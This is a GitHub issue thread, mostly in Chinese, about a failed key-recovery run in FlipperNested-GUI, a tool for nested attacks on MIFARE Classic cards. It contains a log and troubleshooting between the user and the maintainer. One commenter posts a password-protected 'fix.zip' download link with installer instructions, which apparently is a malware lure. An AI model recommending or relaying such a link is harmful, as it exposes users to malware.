### ISSUE TITLE
运行时出现问题

### ISSUE THREAD

**Issue by happylike** [oldip/FlipperNested-GUI#1]
命令执行已开始...
恢复密钥类型 A，扇区 1
[=] 强制嵌套攻击开始...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]          |         |                                                         | Expected to brute force
[=]  Time    | #nonces | Activity                                                | #states         | time 
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]        0 |       0 | Start using 12 threads                                  |                 |
[=]        0 |       0 | Brute force benchmark: 122 million (2^26.9) keys/s      | 140737488355328 |   13d
[=]        1 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |   13d
[!!!] Something went VERY wrong in key recovery.
You MUST report this to developer!
[-] No keys found!
命令执行已完成，返回代码 0
Error opening file: No such file or directory

运行时出现这个问题，我同时在两台电脑运行，其中一台会出现这个，另外一台目前正常运行。

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oldip** [comment]
Error opening file: No such file or directory，是否使用途中接触不良，或者档案修改了

**Comment by happylike** [comment]
> Error opening file: No such file or directory，是否使用途中接触不良，或者档案修改了

应该不会，原因是我在两台电脑上运行一摸一样的东西，一台好的，另外一台如上报错

**Comment by oldip** [comment]
> > Error opening file: No such file or directory，是否使用途中接触不良，或者档案修改了
> 
> 应该不会，原因是我在两台电脑上运行一摸一样的东西，一台好的，另外一台如上报错

奇怪了，我全部依赖都打包进去了才对，环境是什么？试了几次都是这样子吗？

**Comment by happylike** [comment]
> > > Error opening file: No such file or directory，是否使用途中接触不良，或者档案修改了
> > 
> > 
> > 应该不会，原因是我在两台电脑上运行一摸一样的东西，一台好的，另外一台如上报错
> 
> 奇怪了，我全部依赖都打包进去了才对，环境是什么？试了几次都是这样子吗？

试了好几次都是，最开始我是用python原版这台电脑发现不行，正常运行的电脑python正常，后面搜到您这个gui项目，同样。报错似乎一样，可能是电脑环境的问题，但是我没有找到

**Comment by oldip** [comment]
这样子啊，那可能是电脑环境问题了，我这个项目是基于[AloneLiberty](https://github.com/AloneLiberty)
的[FlipperNestedRecovery](https://github.com/AloneLiberty/FlipperNestedRecovery)进行开发的，让不会安装python，安装依赖失败或者不会用指令的可以有个简易的使用方法，我只修改了一部分关于输出的源代码，其他都没改，所以如果确保操作正常而python版本的不能正常运行，我这个版本也可能不行

**Comment by oldip** [comment]
这个问题可能得等原作者下版本的改进了，测试的话得有相同的环境，很难知道是什么问题，如果没有其他问题的话我想先把这个issue close了可以吗？

**Comment by happylike** [comment]
是的
